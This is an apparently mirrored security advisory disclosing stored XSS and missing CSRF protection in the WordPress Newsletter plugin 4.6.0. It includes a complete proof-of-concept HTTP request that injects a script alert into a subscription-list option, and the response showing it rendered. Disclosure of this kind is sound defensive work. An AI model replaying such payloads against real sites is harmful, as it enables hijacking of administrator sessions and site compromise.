Vulners
Lucene search
WordPress Newsletter 4.6.0 Cross Site Request Forgery / Cross Site Scripting
Wordpress Plugin: Newsletter 4.6.0 https://wordpress.org/plugins/newsletter/ is
vulnerable to CSRF and XSS.
The issue is supposed to be fixed in version 4.6.1 . See
https://wordpress.org/plugins/newsletter/changelog/ for more details.
1. Stored Cross-Site Scripting (XSS)
Authenticated administrators can inject html/js code (there is no CSRF
protection).
*Injection Location: *http://localhost/wordpress/wp-admin/admin.php?page=
newsletter_subscription_lists
*Method: *POST
*Retrieval Location: *http://localhost/wordpress/wp-admin/admin.php?page=
newsletter_users_massive
*Vulnerable Parameter(s): *
options[list_1]
options[list_2]
options[list_3]
options[list_4]
options[list_5]
options[list_6]
options[list_7]
options[list_8]
options[list_9]
options[list_10]
options[list_11]
options[list_12]
options[list_13]
options[list_14]
options[list_15]
options[list_16]
options[list_17]
options[list_18]
options[list_19]
options[list_20]
*Example Attack:*
*Request:*
POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0)
Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=
newsletter_subscription_lists
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1762
act=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin%
2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D=
test&options%5Blist_1_status%5D=1&options%5Blist_1_checked%
5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0&
options%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options%
5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options%
5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_
checked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status%
5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=&
options%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0&
options%5Blist_7%5D=bi1x5<script>alert('spiderlabs')<%
2fscript>gjoce&options%5Blist_7_status%5D=0&options%5Blist_
7_checked%5D=0&options%5Blist_8%5D=&options%5Blist_8_status%
5D=0&options%5Blist_8_checked%5D=0&options%5Blist_9%5D=&
options%5Blist_9_status%5D=0&options%5Blist_9_checked%5D=0&
options%5Blist_10%5D=&options%5Blist_10_status%5D=0&options%
5Blist_10_checked%5D=0&options%5Blist_11%5D=&options%
5Blist_11_status%5D=0&options%5Blist_11_checked%5D=0&
options%5Blist_12%5D=&options%5Blist_12_status%5D=0&options%
5Blist_12_checked%5D=0&options%5Blist_13%5D=&options%
5Blist_13_status%5D=0&options%5Blist_13_checked%5D=0&
options%5Blist_14%5D=&options%5Blist_14_status%5D=0&options%
5Blist_14_checked%5D=0&options%5Blist_15%5D=&options%
5Blist_15_status%5D=0&options%5Blist_15_checked%5D=0&
options%5Blist_16%5D=&options%5Blist_16_status%5D=0&options%
5Blist_16_checked%5D=0&options%5Blist_17%5D=&options%
5Blist_17_status%5D=0&options%5Blist_17_checked%5D=0&
options%5Blist_18%5D=&options%5Blist_18_status%5D=0&options%
5Blist_18_checked%5D=0&options%5Blist_19%5D=&options%
5Blist_19_status%5D=0&options%5Blist_19_checked%5D=0&
options%5Blist_20%5D=&options%5Blist_20_status%5D=0&options%
5Blist_20_checked%5D=0
*Response:*
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:12 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102536
*Request:*
GET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1
Host: localhost:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: http://localhost:8888/wordpress/wp-admin/admin.php?
page=newsletter_users_massive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
*Response:*
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:37 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98989
For preference <select id="options-list" name="options[list]"><option
value="1">(1) test</option><option value="2">(2) </option><option
value="3">(3) </option><option value="4">(4) </option><option value="5">(5)
</option><option value="6">(6) </option><option value="7">(7)
bi1x5<script>alert('spiderlabs')</script>gjoce</option><option
value="8">(8)
*Vulnerable PHP Code*
/newsletter/subscription/lists.php:51,52
/users/massive.php
--
Regards,
Keith Lee
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Oct 2016 00:00Current
7.1High risk
Vulners AI Score7.1